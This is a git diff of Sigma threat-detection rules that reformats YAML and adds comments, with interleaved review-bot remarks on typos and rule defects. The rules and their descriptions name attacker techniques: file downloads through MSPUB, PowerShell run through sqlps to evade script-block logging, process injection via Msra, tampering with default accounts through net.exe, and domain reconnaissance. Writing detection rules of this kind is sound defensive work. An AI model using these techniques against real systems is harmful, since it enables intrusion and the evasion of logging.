b/sigma/sysmon/process_creation/proc_creation_win_mspub_download.yml 
@@ -1,8 +1,7 @@ title: Arbitrary File Download Via MSPUB.EXE id: 3b3c7f55-f771-4dd6-8a6e-08d057a17caf status: test -description: Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary - files +description: Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files references: - https://github.com/LOLBAS-Project/LOLBAS/pull/238/files author: Nasreddine Bencherchali (Nextron Systems) @@ -21,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \MSPUB.exe - - OriginalFileName: MSPUB.exe + - Image|endswith: \MSPUB.exe + - OriginalFileName: MSPUB.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ftp:// - http:// - https:// diff --git a/sigma/sysmon/process_creation/proc_creation_win_msra_process_injection.yml b/sigma/sysmon/process_creation/proc_creation_win_msra_process_injection.yml index e75b362a2..af449b8ac 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msra_process_injection.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msra_process_injection.yml @@ -1,10 +1,7 @@ title: Potential Process Injection Via Msra.EXE id: 744a188b-0415-4792-896f-11ddb0588dbc status: test -description: Detects potential process injection via Microsoft Remote Asssistance - (Msra.exe) by looking at suspicious child processes spawned from the aforementioned - process. It has been a target used by many threat actors and used for discovery - and persistence tactics +description: Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics references: - https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/ - https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml index 6876c217a..991e866aa 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml @@ -1,14 +1,9 @@ title: Detection of PowerShell Execution via Sqlps.exe id: 0152550d-3a26-4efd-9f0e-54a0b28ae2f3 status: test -description: 'This rule detects execution of a PowerShell code through the sqlps.exe - utility, which is included in the standard set of utilities supplied with the - MSSQL Server. - - Script blocks are not logged in this case, so this utility helps to bypass protection - mechanisms based on the analysis of these logs. - - ' +description: | + This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. + Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs. references: - https://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15 - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/ 
@@ -32,14 +27,12 @@ detection: selection_parent: ParentImage|endswith: \sqlps.exe selection_image: - - Image|endswith: \sqlps.exe - - OriginalFileName: sqlps.exe + - Image|endswith: \sqlps.exe + - OriginalFileName: sqlps.exe filter_image: ParentImage|endswith: \sqlagent.exe - condition: process_creation and (selection_parent or (selection_image and not - filter_image)) + condition: process_creation and (selection_parent or (selection_image and not filter_image)) falsepositives: - - Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe - spawned by sqlagent.exe is a legitimate action. + - Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml index bf780a1b1..b4f662969 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml 
@@ -1,14 +1,9 @@ title: SQL Client Tools PowerShell Session Detection id: a746c9b8-a2fb-4ee5-a428-92bee9e99060 status: test -description: 'This rule detects execution of a PowerShell code through the sqltoolsps.exe - utility, which is included in the standard set of utilities supplied with the - Microsoft SQL Server Management studio. - - Script blocks are not logged in this case, so this utility helps to bypass protection - mechanisms based on the analysis of these logs. - - ' +description: | + This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio. + Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs. references: - https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml - https://twitter.com/pabraeken/status/993298228840992768 @@ -29,14 +24,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \sqltoolsps.exe - - ParentImage|endswith: \sqltoolsps.exe - - OriginalFileName: \sqltoolsps.exe + - Image|endswith: \sqltoolsps.exe + - ParentImage|endswith: \sqltoolsps.exe + - OriginalFileName: \sqltoolsps.exe filter: ParentImage|endswith: \smss.exe condition: process_creation and (selection and not filter) falsepositives: - - Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess - sqltoolsps.exe spawned by smss.exe is a legitimate action. + - Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_mssql_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_mssql_susp_child_process.yml index 4aaf82634..f73bc8b4c 100644 
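Review bot: `OriginalFileName: \sqltoolsps.exe` in the re-indented selection carries a leading backslash, but OriginalFileName is the PE version-resource field and contains no path, so that exact-match alternative can never fire; the sibling rules in this same commit use the bare name (`OriginalFileName: sqlps.exe`, `OriginalFileName: mstsc.exe`). Because the selection is a list of alternatives, the Image and ParentImage branches still work, so the defect only silently drops the renamed-binary coverage the OriginalFileName check is meant to provide. Change it to `- OriginalFileName: sqltoolsps.exe`.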
--- a/sigma/sysmon/process_creation/proc_creation_win_mssql_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mssql_susp_child_process.yml @@ -1,11 +1,10 @@ title: Suspicious Child Process Of SQL Server id: 869b9ca7-9ea2-4a5a-8325-e80e62f75445 related: - - id: 344482e4-a477-436c-aa70-7536d18a48c7 - type: obsoletes + - id: 344482e4-a477-436c-aa70-7536d18a48c7 + type: obsoletes status: experimental -description: Detects suspicious child processes of the SQLServer process. This could - indicate potential RCE or SQL Injection. +description: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection. author: FPT.EagleEye Team, wagga date: 2020/12/11 modified: 2023/05/04 @@ -26,6 +25,7 @@ detection: selection: ParentImage|endswith: \sqlservr.exe Image|endswith: + # You can add other uncommon or suspicious processes - \bash.exe - \bitsadmin.exe - \cmd.exe @@ -44,7 +44,7 @@ detection: ParentImage|startswith: C:\Program Files\Microsoft SQL Server\ ParentImage|endswith: DATEV_DBENGINE\MSSQL\Binn\sqlservr.exe Image: C:\Windows\System32\cmd.exe - CommandLine|startswith: '"C:\Windows\system32\cmd.exe" ' + CommandLine|startswith: '"C:\Windows\system32\cmd.exe" ' condition: process_creation and (selection and not 1 of filter_optional_*) level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml index fbce1cf3a..6a01c82a3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml 
@@ -1,11 +1,10 @@ title: Suspicious Child Process Of Veeam Dabatase id: d55b793d-f847-4eea-b59a-5ab09908ac90 related: - - id: 869b9ca7-9ea2-4a5a-8325-e80e62f75445 - type: similar + - id: 869b9ca7-9ea2-4a5a-8325-e80e62f75445 + type: similar status: experimental -description: Detects suspicious child processes of the Veeam service process. This - could indicate potential RCE or SQL Injection. +description: Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection. references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers author: Nasreddine Bencherchali (Nextron Systems) @@ -32,7 +31,7 @@ detection: - \pwsh.exe - \wsl.exe - \wt.exe - CommandLine|contains: + CommandLine|contains: - '-ex ' - bypass - cscript diff --git a/sigma/sysmon/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml b/sigma/sysmon/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml index 57b4584e6..0ad11a25f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml @@ -20,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - noconsentprompt - 'shadow:' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_mstsc_remote_connection.yml b/sigma/sysmon/process_creation/proc_creation_win_mstsc_remote_connection.yml index f7d332b31..82a453241 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mstsc_remote_connection.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mstsc_remote_connection.yml 
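Review bot: The title context line `title: Suspicious Child Process Of Veeam Dabatase` has a typo that the commit leaves in place; since the title is what shows up in alert names and dashboards, it should read `title: Suspicious Child Process Of Veeam Database`. This is a one-word fix that would fit naturally in a whitespace/wording pass like this one.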
@@ -1,13 +1,9 @@ title: New Remote Desktop Connection Initiated Via Mstsc.EXE id: 954f0af7-62dd-418f-b3df-a84bc2c7a774 status: test -description: 'Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection - to a remote server. - - Adversaries may use valid accounts to log into a computer using the Remote Desktop - Protocol (RDP). The adversary may then perform actions as the logged-on user. - - ' +description: | + Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server. + Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc @@ -26,13 +22,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \mstsc.exe - - OriginalFileName: mstsc.exe + - Image|endswith: \mstsc.exe + - OriginalFileName: mstsc.exe selection_cli: - CommandLine|contains: ' /v:' + CommandLine|contains: ' /v:' filter_optional_wsl: + # Example: mstsc.exe /v:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX /hvsocketserviceid:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX /silent /wslg /plugin:WSLDVC /wslgsharedmemorypath:WSL\XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\wslg C:\ProgramData\Microsoft\WSL\wslg.rdp ParentImage: C:\Windows\System32\lxss\wslhost.exe - CommandLine|contains: C:\ProgramData\Microsoft\WSL\wslg.rdp + CommandLine|contains: C:\ProgramData\Microsoft\WSL\wslg.rdp condition: process_creation and (all of selection_* and not 1 of filter_optional_*) falsepositives: - WSL (Windows Sub System For Linux) 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml b/sigma/sysmon/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml index c3aac68da..5d844fd13 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml @@ -20,15 +20,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \mstsc.exe - - OriginalFileName: mstsc.exe + - Image|endswith: \mstsc.exe + - OriginalFileName: mstsc.exe selection_cli: - CommandLine|endswith: + CommandLine|endswith: - .rdp - .rdp" filter_optional_wsl: ParentImage: C:\Windows\System32\lxss\wslhost.exe - CommandLine|contains: C:\ProgramData\Microsoft\WSL\wslg.rdp + CommandLine|contains: C:\ProgramData\Microsoft\WSL\wslg.rdp condition: process_creation and (all of selection_* and not 1 of filter_optional_*) falsepositives: - Likely with legitimate usage of ".rdp" files diff --git a/sigma/sysmon/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml b/sigma/sysmon/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml index 1296dd381..31261e9ca 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml @@ -1,8 +1,7 @@ title: Suspicious Mstsc.EXE Execution With Local RDP File id: 6e22722b-dfb1-4508-a911-49ac840b40f8 status: experimental -description: Detects potential RDP connection via Mstsc using a local ".rdp" file - located in suspicious locations. +description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations. references: - https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/ - https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/ 
@@ -20,14 +19,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \mstsc.exe - - OriginalFileName: mstsc.exe + - Image|endswith: \mstsc.exe + - OriginalFileName: mstsc.exe selection_extension: - CommandLine|endswith: + CommandLine|endswith: - .rdp - .rdp" selection_paths: - CommandLine|contains: + # Note: This list of paths is better transformed into a whitelist where you only exclude legitimate locations you use in your env + CommandLine|contains: - :\Users\Public\ - :\Windows\System32\spool\drivers\color - ':\Windows\System32\Tasks_Migrated ' @@ -35,7 +35,8 @@ detection: - :\Windows\Temp\ - :\Windows\Tracing\ - \AppData\Local\Temp\ - - \Downloads\ + # - '\Desktop\' # Could be source of FP depending on the environment + - \Downloads\ # Could be source of FP depending on the environment condition: process_creation and (all of selection_*) falsepositives: - Likelihood is related to how often the paths are used in the environment diff --git a/sigma/sysmon/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml b/sigma/sysmon/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml index aa7b73cc2..c0202d846 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml @@ -1,8 +1,7 @@ title: Mstsc.EXE Execution From Uncommon Parent id: ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6 status: experimental -description: Detects potential RDP connection via Mstsc using a local ".rdp" file - located in suspicious locations. +description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations. references: - https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/ - https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/ 
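Review bot: The reflowed description of the "Mstsc.EXE Execution From Uncommon Parent" rule (second hunk on this line) is a verbatim copy of the susp_location rule's description (`...using a local ".rdp" file located in suspicious locations`), which does not describe what this rule matches; the detection in the following hunk keys on browser and email-client parents, not on file paths. Suggest `description: Detects execution of Mstsc.EXE with an uncommon parent process such as a web browser or email client, which could indicate a user opening a downloaded or attached ".rdp" file.` In the susp_location hunk, the new `# Could be source of FP` comments on `\Downloads\` and the commented-out `\Desktop\` entry are useful, but the preceding note would read more clearly as `# Note: Consider converting this path list into an exclusion list where only legitimate locations used in your environment are filtered out`.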
@@ -21,6 +20,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_parent: ParentImage|endswith: + # Covers potential downloads/clicks from browsers - \brave.exe - \CCleanerBrowser.exe - \chrome.exe @@ -32,10 +32,11 @@ detection: - \opera.exe - \vivaldi.exe - \whale.exe + # Covers potential downloads/clicks from email clients - \outlook.exe selection_img: - - Image|endswith: \mstsc.exe - - OriginalFileName: mstsc.exe + - Image|endswith: \mstsc.exe + - OriginalFileName: mstsc.exe condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_msxsl_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_msxsl_execution.yml index a8b00178e..0ab372d9f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msxsl_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msxsl_execution.yml @@ -1,14 +1,9 @@ title: Msxsl.EXE Execution id: 9e50a8b3-dd05-4eb8-9153-bdb6b79d50b0 status: test -description: 'Detects the execution of the MSXSL utility. This can be used to execute - Extensible Stylesheet Language (XSL) files. These files are commonly used to describe - the processing and rendering of data within XML files. - - Adversaries can abuse this functionality to execute arbitrary files while potentially - bypassing application whitelisting defenses. - - ' +description: | + Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files. + Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/ 
@@ -31,5 +26,6 @@ detection: condition: process_creation and selection falsepositives: - Msxsl is not installed by default and is deprecated, so unlikely on most systems. +# Note: If you levreage this utility please consider adding additional filters. As this is looking for "any" type of execition level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_msxsl_remote_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_msxsl_remote_execution.yml index 63512a272..594055cb1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msxsl_remote_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msxsl_remote_execution.yml @@ -1,8 +1,7 @@ title: Remote XSL Execution Via Msxsl.EXE id: 75d0a94e-6252-448d-a7be-d953dff527bb status: experimental -description: Detects the execution of the "msxsl" binary with an "http" keyword in - the command line. This might indicate a potential remote execution of XSL files. +description: Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/ @@ -21,7 +20,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \msxsl.exe - CommandLine|contains: http + CommandLine|contains: http condition: process_creation and selection falsepositives: - Msxsl is not installed by default and is deprecated, so unlikely on most systems. diff --git a/sigma/sysmon/process_creation/proc_creation_win_net_default_accounts_manipulation.yml b/sigma/sysmon/process_creation/proc_creation_win_net_default_accounts_manipulation.yml index 4408b5173..2a22095b7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_net_default_accounts_manipulation.yml 
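Review bot: The comment added between `falsepositives` and `level` in the Msxsl.EXE Execution rule has two typos (`levreage`, `execition`) and a sentence fragment; suggest `# Note: If you leverage this utility in your environment, consider adding additional filters, as this rule matches any execution of it.` The point the comment makes is a good one, since the rule matches on the image name alone and the falsepositives entry already says the tool is deprecated and rarely present.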
+++ b/sigma/sysmon/process_creation/proc_creation_win_net_default_accounts_manipulation.yml @@ -1,8 +1,7 @@ title: Suspicious Manipulation Of Default Accounts Via Net.EXE id: 5b768e71-86f2-4879-b448-81061cbae951 status: test -description: Detects suspicious manipulations of default accounts such as 'administrator' - and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc +description: Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc references: - https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html - https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/ 
@@ -22,54 +21,53 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_user_option: - CommandLine|contains: ' user ' + CommandLine|contains: ' user ' selection_username: - CommandLine|contains: - - " J\xE4rjestelm\xE4nvalvoja " - - ' Rendszergazda ' - - " \u0410\u0434\u043C\u0438\u043D\u0438\u0441\u0442\u0440\u0430\u0442\ - \u043E\u0440 " - - ' Administrateur ' - - ' Administrador ' - - " Administrat\xF6r " - - ' Administrator ' + CommandLine|contains: + # Note: We need to write the full account name for cases starting with 'admin' to avoid lookups only with the user flag + - ' Järjestelmänvalvoja ' # Finish + - ' Rendszergazda ' # Hungarian + - ' Администратор ' # Russian + - ' Administrateur ' # French + - ' Administrador ' # Portuguese (Brazil + Portugal) + Spanish + - ' Administratör ' # Swedish + - ' Administrator ' # English - ' guest ' - ' DefaultAccount ' - - " \"J\xE4rjestelm\xE4nvalvoja\" " - - ' "Rendszergazda" ' - - " \"\u0410\u0434\u043C\u0438\u043D\u0438\u0441\u0442\u0440\u0430\u0442\ - \u043E\u0440\" " - - ' "Administrateur" ' - - ' "Administrador" ' - - " \"Administrat\xF6r\" " - - ' "Administrator" ' + # The cases below are for when an attacker requests the net command via 'cmd /c....' 
+ # First in double quotes + - ' "Järjestelmänvalvoja" ' # Finish + - ' "Rendszergazda" ' # Hungarian + - ' "Администратор" ' # Russian + - ' "Administrateur" ' # French + - ' "Administrador" ' # Portuguese (Brazil + Portugal) + Spanish + - ' "Administratör" ' # Swedish + - ' "Administrator" ' # English - ' "guest" ' - ' "DefaultAccount" ' - - " 'J\xE4rjestelm\xE4nvalvoja' " - - ' ''Rendszergazda'' ' - - " '\u0410\u0434\u043C\u0438\u043D\u0438\u0441\u0442\u0440\u0430\u0442\ - \u043E\u0440' " - - ' ''Administrateur'' ' - - ' ''Administrador'' ' - - " 'Administrat\xF6r' " - - ' ''Administrator'' ' - - ' ''guest'' ' - - ' ''DefaultAccount'' ' + # Second in single quotes + - " 'Järjestelmänvalvoja' " # Finish + - " 'Rendszergazda' " # Hungarian + - " 'Администратор' " # Russian + - " 'Administrateur' " # French + - " 'Administrador' " # Portuguese (Brazil + Portugal) + Spanish + - " 'Administratör' " # Swedish + - " 'Administrator' " # English + - " 'guest' " + - " 'DefaultAccount' " filter: - CommandLine|contains|all: + CommandLine|contains|all: - guest - /active no condition: process_creation and (all of selection_* and not filter) falsepositives: - - Some false positives could occur with the admin or guest account. It depends - on the scripts being used by the admins in your env. If you experience a lot - of FP you could reduce the level to medium + - Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml b/sigma/sysmon/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml index 81421b066..b8b30ee10 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml 
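Review bot: The rewritten selection_username list replaces the `\xE4`, `\xF6` and `\u0410...` escapes with literal non-ASCII characters, so the rule now depends on the file being read as UTF-8, whereas the escaped form was encoding-agnostic; the match values are otherwise unchanged, but it is worth confirming the consuming tool decodes rule files as UTF-8 on every platform before relying on this form. Separately, the language tags `# Finish` on the three Järjestelmänvalvoja entries should read `# Finnish`. The enclosing hunk starts on the previous line.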
@@ -1,14 +1,12 @@ title: Suspicious Group And Account Reconnaissance Activity Using Net.EXE id: d95de845-b83c-4a9a-8a6a-4fc802ebf6c0 status: test -description: Detects suspicious reconnaissance command line activity on Windows systems - using Net.EXE +description: Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE references: - https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ - https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/ - https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/ -author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali - (Nextron Systems) +author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems) date: 2019/01/16 modified: 2023/03/02 tags: 
@@ -24,35 +22,38 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe + # Covers group and localgroup flags selection_group_root: - CommandLine|contains: + CommandLine|contains: - ' group ' - ' localgroup ' selection_group_flags: - CommandLine|contains: + CommandLine|contains: + # Add more groups for other languages - domain admins - - ' administrator' - - ' administrateur' + - ' administrator' # Typo without an 'S' so we catch both + - ' administrateur' # Typo without an 'S' so we catch both - enterprise admins - Exchange Trusted Subsystem - Remote Desktop Users - - "Utilisateurs du Bureau \xE0 distance" - - Usuarios de escritorio remoto - - ' /do' + - Utilisateurs du Bureau à distance # French for "Remote Desktop Users" + - Usuarios de escritorio remoto # Spanish for "Remote Desktop Users" + - ' /do' # short for domain filter_group_add: - CommandLine|contains: ' /add' + # This filter is added to avoid the potential case where the point is not recon but addition + CommandLine|contains: ' /add' + # Covers 'accounts' flag selection_accounts_root: - CommandLine|contains: ' accounts ' + CommandLine|contains: ' accounts ' selection_accounts_flags: - CommandLine|contains: ' /do' - condition: process_creation and (selection_img and ((all of selection_group_* - and not filter_group_add) or all of selection_accounts_*)) + CommandLine|contains: ' /do' # short for domain + condition: process_creation and (selection_img and ((all of selection_group_* and not filter_group_add) or all of selection_accounts_*)) fields: - CommandLine - ParentCommandLine 
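Review bot: The comments `# Typo without an 'S' so we catch both` on `' administrator'` and `' administrateur'` are misleading: the missing trailing letter is deliberate so the substring matches both the singular and plural group names, and calling it a typo invites a future maintainer to "fix" it and break the plural match. Suggest `# Intentionally without trailing 's' to match both 'administrator' and 'administrators'` (and the French equivalent). The `# short for domain` comment on `' /do'` is accurate and helpful; the same style would suit the two group-name entries.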
@@ -61,6 +62,5 @@ falsepositives: - Administrative activity level: medium analysis: - recommendation: Check if the user that executed the commands is suspicious (e.g. - service accounts, LOCAL_SYSTEM) + recommendation: Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM) ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_net_network_connections_discovery.yml b/sigma/sysmon/process_creation/proc_creation_win_net_network_connections_discovery.yml index 4d56d9f19..3448866d4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_net_network_connections_discovery.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_net_network_connections_discovery.yml @@ -1,9 +1,7 @@ title: System Network Connections Discovery Via Net.EXE id: 1c67a717-32ba-409b-a45d-0fb704a73a81 status: test -description: Adversaries may attempt to get a listing of network connections to or - from the compromised system they are currently accessing or from remote systems - by querying for information over the network. +description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery author: frack113 
@@ -21,19 +19,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - - CommandLine|endswith: - - ' use' - - ' sessions' - - CommandLine|contains: - - ' use ' - - ' sessions ' + - CommandLine|endswith: + - ' use' + - ' sessions' + - CommandLine|contains: + - ' use ' + - ' sessions ' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_net_share_and_sessions_enum.yml b/sigma/sysmon/process_creation/proc_creation_win_net_share_and_sessions_enum.yml index 668b1edbc..76c97450c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_net_share_and_sessions_enum.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_net_share_and_sessions_enum.yml @@ -1,8 +1,7 @@ title: Share And Session Enumeration Using Net.EXE id: 62510e69-616b-4078-b371-847da438cc03 status: stable -description: Detects attempts to enumerate file shares, printer shares and sessions - using "net.exe" with the "view" flag. +description: Detects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag. references: - https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md 
